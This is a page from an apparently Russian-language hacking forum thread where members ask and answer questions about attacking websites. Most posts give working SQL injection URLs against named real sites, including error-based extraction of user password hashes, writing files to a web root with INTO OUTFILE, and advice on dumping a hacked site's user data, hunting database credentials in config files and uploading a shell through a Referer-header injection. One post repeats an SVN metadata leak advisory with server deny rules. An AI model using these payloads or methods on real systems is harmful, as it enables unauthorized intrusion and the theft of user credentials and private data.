Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    http://www.sin-bad.ru/main.php?f=10+UnIoN+sElEcT+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16--+f
    В самом низу
    4.0.27-log
     
    _________________________
    1 person likes this.
  2. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Это прикол, да?
    Что за палки перед операторами?
    С чего ты взял, что там фильтр какой-то?

    Извините, конечно, но это *facepalm*.

    http://www.radimpex.rs/download.php?id=1 and(substring(version(),1,1)=3)&lang=en


    Там просто мускул 3ей ветки =\

    http://www.radimpex.rs/download.php?id=1 or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- -&lang=en
    Duplicate entry '3.23.581' for key 1
     
    #20102 Tigger, 14 Apr 2012
    Last edited: 14 Apr 2012
    1 person likes this.
  3. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Гуглил "WAF Bypass" ,нашел видео и по нему делал с "палками"

    Спасибо
     
    _________________________
  4. skagen

    skagen Member

    Joined:
    8 Jan 2010
    Messages:
    122
    Likes Received:
    13
    Reputations:
    0
    возникла проблема с выводом приватной информации с похеканного сайта. некоторую информацию выводит нормально, но как только прописываю таблицы с паролями юзеров, сразу перекидывает на главную страницу сайта (и там пропечатывается мой код запроса в каком-нибудь поле). попытался вставить сайт в прогу Havij. она загрузила таблицы и поля. я взял загрузить то поле, которое было с паролями юзеров. но вылезло "Turning off 'bypass illegal union' and retrying". скажите, в чем проблема? я думаю, что нужны права админа. доступ к админке сайта есть
     
  5. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    skagen
    Кодировка.
    Попробуй:
    SELECT unhex(hex(version())) FROM ...
    Либо другие варианты, описанные в статьях.
     
  6. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    такой вопрос, есть логин и пароль от БД, phpmyadmin нету, в строке host стоит знак % тоесть можно подключатся к с любого ипа, но проблема в том что нет открытого 3306 порта. както можно ещо иначе подключится или безнадёжно?
     
  7. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    733
    Likes Received:
    73
    Reputations:
    19
    Проскань порты мб на другом висит.
    Но мускуль очень редко смотрит наружу.
     
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    та сканил, всё что есть

    PHP:
    Discovered open port 25/tcp 
    Discovered open port 110
    /tcp 
    Discovered open port 80
    /tcp 
    Discovered open port 53
    /tcp 
    Discovered open port 443
    /tcp 
     
  9. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108



    Это не все что есть. Если сайт того стоит - потрать время , потрудись и проскань как можно большее количество портов. Изучи ответ сервера по каждому порту, а не смотри в дамп проги чем ты там сканишь. К тому-же, посмотри в конфигах и реверс IP какие субдомены имеются. Частенько делают базовый домен на который прекрывают порты а к примеру mysql.site.ru открыт для подключения. Опять -же, через реверс IP пробей может зальешься на смежные домены, тогда локально подключишься.
     
  10. Chuvash

    Chuvash New Member

    Joined:
    12 Mar 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Выкачал папку phpmyadmin с сервера, в ней находятся все базы данных сайтов хостящихся на этом сервере?
     
  11. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    http://twocomrades.ru/svn
    Уязвимость SVN всех версий

    Нами была найдена уязвимость SVN всех версий, с помощью которой можно получить исходные коды проекта.

    Уязвимость имеет силу на проектах, исходные коды которого обновляются через SVN и вебсервер не запрещает читать скрытые директории. По умолчанию ни один вебсервер это не делает.

    Степень угрозы: средняя/высокая

    Архитектура SVN предусматривает хранение метаданных и версионную информацию файла для каждой директории исходных кодов. Данные находятся в метадиректории «.svn». Получив доступ к ней, можно как минимум построить файловое дерево проекта, узнать URL основного репозитория и список пользователей SVN, как максимум — получить доступ к исходным кодам проекта.

    Исследование было произведено совместно с Антоном Исайкиным.
    Способы защиты

    Закрыв доступ на чтение из скрытых директорий на сервере, вы обезопасите себя от подобных уявимостей.

    Nginx (лучший вебсервер всех времён и народов, кстати)

    location ~ \.svn {
    deny all;
    }


    Apache

    <Directory ~ ".*\.svn">
    Order allow,deny
    Deny from all
    Satisfy All
    </Directory>


    SVN
    По возможности делать выгрузку исходникиов на продакшен-сервер посредством svn export.



    Кто знает подробнее?
     
  12. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    ReV0LVeR
    http://habrahabr.ru/post/70330/

    Нет. PHPMyAdmin - лишь оболочка.
     
  13. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user
    http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user+into+outfile+%27/var/www/properm.ru/htdocs/1.txt%27--+
    http://spravka.properm.ru/category.php?pid=100+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user+into+outfile+%27tmp/1.txt%27--+

    что не так?
     
  14. Chuvash

    Chuvash New Member

    Joined:
    12 Mar 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    А где тогда лежат файлы баз данных? просто имеется доступ ко всему диску сервера....
     
  15. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    Chuvash, ищи логин и пароль к бд в конфигурационных фаилах таких как *config, config.inc.php и т д , цепляйся к бд делай полный дамп.
     
  16. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    Базы данных физически располагаются в директории указанной в конфигурации msyql сервера. Различия могут быть в зависимости как от дистрибутива, так и опционально указанные при компиляции либо измененные после установки. Смотри my.cnf
     
  17. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Привет, есть вопрос.
    Имею скуль типа
    Code:
    script.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+password+FROM+tablename+LIMIT+0,1),floor(rand(0)*2)))+--+
    Есть все основания полагать, что соленый хеш может быть больше 64 символов.
    Вопрос- как получить остальные символы, т.к. выдает только первые 64?
     
    _________________________
  18. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    несовсем тебя понял,
    1)посмотри их в тругой таблице
    2) если как я понял у тебя соль вместе с хешами и стоит ограничение на длину вывода то воспользуйся функцией substr

    тут типа c 1-50 символов
    Code:
    script.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+substr(password,1,50)+FROM+tablename+LIMIT+0,1),floor(rand(0)*2)))+--+
    тут типа c 50-100 символов
    Code:
    script.php?id=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat((SELECT+substr(password,50,100)+FROM+tablename+LIMIT+0,1),floor(rand(0)*2)))+--+
    сори если опять туплю)
     
  19. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    ребят,подскажите,пожалуйста...

    есть сайт на нем есть файл error.log,в который записываются ошибки БД...на самом сайте вывод ошибок отключен по-видимому...да и найти ошибку,которая фиксировалась бы в файле тоже оказалось сложно...однако,я её нашёл и хотел спросить можно ли с помощью данного файла и правильно составленного запроса залить шелл или вывести хоть какую-ту нужную информацию?

    часть файла еррор.лог:
    Code:
    [15-Apr-2012 18:29:23] Mysql Error:  - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: 			UPDATE sessions SET			partner='38',			partnerTyp='A',			template='01',			host='374',			kampagne='',			keywords='',			pageviews='1',			ref='1'"3000',			design_sitename='In Ist Drin',			design_headline='',			design_subline='',			design_individuell='0'			WHERE sid='1db420cb93a608c25c4c2990f164ea55'			 		 
    
    [15-Apr-2012 19:19:05] Mysql Error:  - /var/www/папка сайта/httpdocs/index.php - Querystring: seite=index&id=1%27%221000 - Query: 			UPDATE sessions SET			partner='38',			partnerTyp='A',			template='01',			host='374',			kampagne='',			keywords='',			pageviews='1',			ref='1'"0000 union select version() --',			design_sitename='In Ist Drin',			design_headline='',			design_subline='',			design_individuell='0'			WHERE sid='792bce446a531fd049eaa1b174c5ecba'	

    ошибка возникает в заголовке referer (ref)
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Если кавычки не слешируются, то можешь попробывать реализовать полноценную SQL-иньекцию, если файл сможешь прочитать как пхп код, то сможешь реализовать PHP-иньекцию, экспириментируй, все в твоих руках!

    P.S: если не ошибаюсь то кавычки не слешируются...
     
    _________________________
Thread Status:
Not open for further replies.